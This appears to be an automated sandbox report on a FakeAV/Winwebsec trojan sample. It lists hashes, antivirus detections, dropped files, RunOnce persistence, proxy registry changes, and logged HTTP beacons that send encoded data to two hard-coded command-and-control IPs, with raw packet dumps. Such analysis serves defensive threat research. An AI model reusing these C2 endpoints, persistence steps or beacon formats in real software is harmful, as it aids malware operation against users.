Analysis Date2015-09-07 00:18:38
MD53bf70048b84f24209f1b18bbddb7df7c
SHA15beb6edd15712f7cc454cad75322c54bf5151dcb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1288991a9c5fd7fbe9e10c33194a7f1b sha1: a17958588662c27215699550ec4e523854913d16 size: 181760
Section.rdata md5: 02e582a7214ac986b632e633a75288cc sha1: 246ed5fdb450a36f1e0934a9a2bd582509f59237 size: 2048
Section.data md5: fcad16bfa9d1017ab26c27a3814b568b sha1: 4534d1bc8aeea0ee3ffb429f3b568811bc940bbd size: 122368
Section.rsrc md5: 37c01c87464a34242230feaabfbef9a1 sha1: 44cabb61a6a8beaf2c68292365e931757d36d255 size: 5120
Timestamp1970-01-01 05:15:22
PEhashd988b0829a0f3cf9cf5a37856f6f5f76f0887e41
IMPhash8aaaf4897d2db89e81da04378e9e697c
AVK7Trojan ( 001e60c61 )
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVCAT (quickheal)FraudTool.Security
AVAlwil (avast)MalOb-FY [Cryp]
AVAvira (antivir)TR/FakeAV.btxt.7
AVEset (nod32)Win32/Kryptik.LYW
AVAuthentiumW32/FakeAlert.LY.gen!Eldorado
AVMalwareBytesTrojan.Agent
AVBitDefenderGen:Heur.Cridex.2
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVZillya!Trojan.FakeAV.Win32.56917
AVArcabit (arcavir)Gen:Heur.Cridex.2
AVRisingTrojan.FakeAV!49B1
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo
AVMcafeeGeneric FakeAlert.amb
AVAd-AwareGen:Heur.Cridex.2
AVBullGuardGen:Heur.Cridex.2
AVFrisk (f-prot)W32/FakeAlert.LY.gen!Eldorado
AVClamAVTrojan.FakeAV-5389
AVGrisoft (avg)FakeAlert.AAS
AVTwisterTrojan.558BEC81C4DCFAFFF.mg
AVKasperskyTrojan.Win32.FakeAV.btxt
AVEmsisoftGen:Heur.Cridex.2
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVFortinetW32/FakeAlert.AMB!tr
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroTROJ_FAKEAV.SMID
AVPadvishMalware.Trojan.FakeAV-5389
AVF-SecureGen:Heur.Cridex.2
AVDr. WebTrojan.Inject.28816
AVIkarusTrojan.Win32.FakeAV

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a3A64.tmp
Creates FileC:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe
Creates FileC:\5beb6edd15712f7cc454cad75322c54bf5151dcb
Deletes FileC:\5beb6edd15712f7cc454cad75322c54bf5151dcb
Creates Process"C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe" "C:\malware.exe"
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aE22D.tmp"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jGpJoLnFdJa25900 ➝
C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE22D.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=25900
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.77/i.php?affid=25900
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GEThttp://69.50.195.77/r.php?affid=25900&data=31AEA843B2D209EF2E25E669DAB068379E8D0586096F1D0BFB8CD08A81B3C857010410&v=1&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.77:80
Flows TCP192.168.1.1:1034 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 32353930 30204854 54502f31   fid=25900 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3235 39303020 48545450 2f312e31   d=25900 HTTP/1.1
0x00000020 (00032)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000030 (00048)   2f2f3639 2e35302e 3139352e 37370d0a   //69.50.195.77..
0x00000040 (00064)   41636365 70743a20 2a2f2f2a 0d0a436f   Accept: *//*..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a55   rm-urlencoded..U
0x00000080 (00128)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000090 (00144)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000a0 (00160)   6c653b20 4d534945 20372e30 3b205769   le; MSIE 7.0; Wi
0x000000b0 (00176)   6e646f77 73204e54 20352e31 3b204754   ndows NT 5.1; GT
0x000000c0 (00192)   42302e30 3b202e4e 45542043 4c522031   B0.0; .NET CLR 1
0x000000d0 (00208)   2e312e34 33323229 0d0a486f 73743a20   .1.4322)..Host: 
0x000000e0 (00224)   36392e35 302e3139 352e3737 0d0a436f   69.50.195.77..Co
0x000000f0 (00240)   6e74656e 742d4c65 6e677468 3a203738   ntent-Length: 78
0x00000100 (00256)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000110 (00272)   65702d41 6c697665 0d0a4361 6368652d   ep-Alive..Cache-
0x00000120 (00288)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000130 (00304)   650d0a0d 0a646174 613d3331 41454138   e....data=31AEA8
0x00000140 (00320)   34334232 44323039 45463245 32354536   43B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373945 38443035   69DAB068379E8D05
0x00000160 (00352)   38363039 36463144 30424642 38434430   86096F1D0BFB8CD0
0x00000170 (00368)   38413831 42334338 35373031 30343126   8A81B3C85701041&
0x00000180 (00384)   763d31                                v=1

0x00000000 (00000)   47455420 2f722e70 68703f61 66666964   GET /r.php?affid
0x00000010 (00016)   3d323539 30302664 6174613d 33314145   =25900&data=31AE
0x00000020 (00032)   41383433 42324432 30394546 32453235   A843B2D209EF2E25
0x00000030 (00048)   45363639 44414230 36383337 39453844   E669DAB068379E8D
0x00000040 (00064)   30353836 30393646 31443042 46423843   0586096F1D0BFB8C
0x00000050 (00080)   44303841 38314233 43383537 30313034   D08A81B3C8570104
0x00000060 (00096)   31302676 3d312668 3d312048 5454502f   10&v=1&h=1 HTTP/
0x00000070 (00112)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000080 (00128)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000090 (00144)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x000000a0 (00160)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x000000b0 (00176)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000c0 (00192)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000d0 (00208)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000e0 (00224)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000f0 (00240)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000100 (00256)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000110 (00272)   290d0a48 6f73743a 2036392e 35302e31   )..Host: 69.50.1
0x00000120 (00288)   39352e37 370d0a43 6f6e6e65 6374696f   95.77..Connectio
0x00000130 (00304)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x00000140 (00320)   0a334232 44323039 45463245 32354536   .3B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373945 38443035   69DAB068379E8D05
0x00000160 (00352)   38363039 36463144 30424642 38434430   86096F1D0BFB8CD0
0x00000170 (00368)   38413831 42334338 35373031 30343126   8A81B3C85701041&
0x00000180 (00384)   763d31                                v=1


Strings